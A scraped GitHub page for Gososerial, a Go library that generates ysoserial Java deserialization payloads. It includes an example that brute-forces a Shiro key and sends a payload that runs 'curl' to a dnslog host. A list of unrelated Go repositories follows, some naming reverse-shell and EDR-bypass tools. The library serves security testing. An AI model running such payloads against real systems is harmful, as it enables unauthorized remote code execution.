Dynamically Generates Ysoserial's Payload by Golang

Overview

Gososerial

介绍

  • ysoserial是java反序列化安全方面著名的工具

  • 无需java环境,无需下载ysoserial.jar文件

  • 输入命令直接获得payload,方便编写安全工具

  • 目前已支持CC1-CC7,K1-K4和CB1链

Introduce

  • Ysoserial is a well-known tool for Java deserialization security

  • No Java environment and no need to download ysoserial.jar file

  • Enter the command to directly obtain the payload, which is convenient for writing security tools

  • Support CommonsCollections1-7,K1-K4,CommonsBeanutils1 Now

Example

CommonsCollections1 Payload

List of Supported

Quick Start

go get github.com/EmYiQing/Gososerial
package main

import gososerial "github.com/EmYiQing/Gososerial"

func main()  {
	payload := gososerial.GetCC1("calc.exe")
	......
	sendPayload(payload)
	......
}

Example

func main() {
	// Shiro Scan Code
	target := "http://shiro_ip/"
	// Brust Shiro AES Key 
	key := shiro.CheckShiroKey(target)
	if key != "" {
		log.Info("find key: %s", key)
	}
	// Use CommonsCollections5 Payload
	var payload []byte
	payload = gososerial.GetCC5("curl xxxxx.ceye.io")
	// Send Cookies Encrypted By AES
	shiro.SendPayload(key, payload, target)
	// Receive Results Using Dnslog API
	if ceye.CheckResult("your_ceye_token") {
		log.Info("find shiro!")
	}
}

About

参考了xray中p师傅的代码

ysoserial: https://github.com/frohoff/ysoserial

xray: https://github.com/chaitin/xray

phith0n: https://github.com/phith0n

免责申明

未经授权许可使用Gososerial攻击目标是非法的

本程序应仅用于授权的安全测试与研究目的。

Releases(v0.1.0)
Owner
4ra1n
Web Security Researcher / Student of NCEPU
4ra1n
Asn.1 BER and DER encoding library for golang.

WARNING This repo has been archived! NO further developement will be made in the foreseen future. asn1 -- import "github.com/PromonLogicalis/asn1" Pac

Logicalis 51 Aug 3, 2022
auto-generate capnproto schema from your golang source files. Depends on go-capnproto-1.0 at https://github.com/glycerine/go-capnproto

bambam: auto-generate capnproto schema from your golang source files. Adding capnproto serialization to an existing Go project used to mean writing a

Jason E. Aten, Ph.D. 64 Jan 29, 2022
Golang binary decoder for mapping data into the structure

binstruct Golang binary decoder to structure Install go get -u github.com/ghostiam/binstruct Examples ZIP decoder PNG decoder Use For struct From file

Vladislav Fursov 56 Jul 18, 2022
CBOR RFC 7049 (Go/Golang) - safe & fast with standard API + toarray & keyasint, CBOR tags, float64/32/16, fuzz tested.

CBOR library in Go fxamacker/cbor is a CBOR encoder & decoder in Go. It has a standard API, CBOR tags, options for duplicate map keys, float64→32→16,

Faye Amacker 469 Aug 3, 2022
csvutil provides fast and idiomatic mapping between CSV and Go (golang) values.

csvutil Package csvutil provides fast and idiomatic mapping between CSV and Go (golang) values. This package does not provide a CSV parser itself, it

Jacek Szwec 736 Aug 5, 2022
Fixed width file parser (encoder/decoder) in GO (golang)

Fixed width file parser (encoder/decoder) for GO (golang) This library is using to parse fixed-width table data like: Name Address

Oleg Lobanov 20 Aug 5, 2022
Fast implementation of base58 encoding on golang.

Fast Implementation of Base58 encoding Fast implementation of base58 encoding in Go. Base algorithm is adapted from https://github.com/trezor/trezor-c

Denis Subbotin 124 Aug 1, 2022
msgpack.org[Go] MessagePack encoding for Golang

MessagePack encoding for Golang ❤️ Uptrace.dev - All-in-one tool to optimize performance and monitor errors & logs Join Discord to ask questions. Docu

Vladimir Mihailenco 1.8k Aug 12, 2022
Encode and decode Go (golang) struct types via protocol buffers.

protostructure protostructure is a Go library for encoding and decoding a struct type over the wire. This library is useful when you want to send arbi

Mitchell Hashimoto 171 Mar 24, 2022
golang struct 或其他对象向 []byte 的序列化或反序列化

bytecodec 字节流编解码 这个库实现 struct 或其他对象向 []byte 的序列化或反序列化 可以帮助你在编写 tcp 服务,或者需要操作字节流时,简化数据的组包、解包 这个库的组织逻辑 copy 借鉴了标准库 encoding/json ?? 安装 使用 go get 安装最新版本

null 7 Jun 30, 2022
A k-mer serialization package for Golang

.uniq v5 This package provides k-mer serialization methods for the package kmers, TaxIds of k-mers are optionally saved, while there's no frequency in

Wei Shen 6 Jun 16, 2022
Some Golang types based on builtin. Implements interfaces Value / Scan and MarshalJSON / UnmarshalJSON for simple working with database NULL-values and Base64 encoding / decoding.

gotypes Some simple types based on builtin Golang types that implement interfaces for working with DB (Scan / Value) and JSON (Marshal / Unmarshal). N

null 0 Feb 12, 2022
gogoprotobuf is a fork of golang/protobuf with extra code generation features.

GoGo Protobuf looking for new ownership Protocol Buffers for Go with Gadgets gogoprotobuf is a fork of golang/protobuf with extra code generation feat

null 0 Nov 26, 2021
generic sort for slices in golang

slices generic sort for slices in golang basic API func BinarySearch[E constraints.Ordered](list []E, x E) int func IsSorted[E constraints.Ordered](li

阮坤良 15 Jul 26, 2022
Bitbank-trezor - Bitbank trezor with golang

Bitbank - Trezor (c) 2022 Bernd Fix [email protected] >Y< bitbank-trezor is fre

Bernd Fix 0 Jan 27, 2022
Gofrette is a reverse shell payload developed in Golang that bypasses Windows defender and many others anti-virus.

Gofrette Gofrette is a reverse shell payload developed in Golang that bypasses Windows defender and many others anti-virus.

null 12 Jul 19, 2022
ScareCrow - Payload creation framework designed around EDR bypass.

ScareCrow More Information If you want to learn more about the techniques utlized in this framework please take a look at Part 1 and Part 2 Descriptio

Optiv Security 2k Aug 7, 2022
Another Go shellcode loader designed to work with Cobalt Strike raw binary payload.

Bankai Another Go shellcode loader designed to work with Cobalt Strike raw binary payload. I created this project to mainly educate myself learning Go

bigb0ss 111 Aug 11, 2022
Payload is a simple tool for working with production data in your local environment.

Payload Payload is a simple tool for working with production data in your local environment. What problem does it solve? You're working with Cloud SQL

Ivan Vanderbyl 1 Oct 13, 2021
generate protobuf for asynq payload.

protoc-gen-go-asynq generate protobuf for asynq payload. usage 1. install protoc-gen-go-asynq # first install protobuf, then install go get -d google.

Jmploop 2 Dec 22, 2021
Help fuzz various protocols and waits for ping backs Integrates LDAP server and JNDI payload

l9fuzz Fuzzes various protocols with JNDI LDAP payloads and listen for ping backs Features Low CPU/Memory footprint Integrated LDAP server Trace orign

null 11 Jan 13, 2022
Google-pay-decryptor - Google Pay payload decryptor Tool

Google Pay Decryptor Tool Tired of looking for information about cryptography an

Rakhat 4 Mar 20, 2022
Easily and dynamically generate maps from Go static structures

structomap This package helps you to transform your struct into map easily. It provides a structomap.Serializer interface implemented by the structoma

Daniel Perez 134 Jul 24, 2022
a dynamically typed, garbage collected, embeddable programming language built with Go

The agora programming language Agora is a dynamically typed, garbage collected, embeddable programming language. It is built with the Go programming l

Martin Angers 324 Jul 26, 2022
A kubernetes plugin which enables dynamically add or remove GPU resources for a running Pod

GPU Mounter GPU Mounter is a kubernetes plugin which enables add or remove GPU resources for running Pods. This Introduction(In Chinese) is recommende

XinYuan 72 Jul 18, 2022
Dynamically generated Last.fm stats for your profile readme

GitHub Readme Last.fm Stats Dynamically generated last.fm stats in your profile readme Contents Usage Options Demo Development & Deployment Issues, Re

Rafael Wiska-Ilnicki 6 Mar 17, 2022
LazySSH is an SSH server that acts as a jump host only, and dynamically starts temporary virtual machines.

LazySSH is an SSH server that acts as a jump host only, and dynamically starts temporary virtual machines. If you find yourself briefly starti

Stéphan Kochen 473 Jun 12, 2022
System resource usage profiler tool which regularly takes snapshots of the memory and CPU load of one or more running processes so as to dynamically build up a profile of their usage of system resources.

Vegeta is a system resource usage tracking tool built to regularly take snapshots of the memory and CPU load of one or more running processes, so as to dynamically build up a profile of their usage of system resources.

Kartik 8 Jan 16, 2022
Dynamically update DNS records with your interface's public IPs

Dynamically update DNS records with your interface's public IPs

Micah Hausler 3 Jul 2, 2022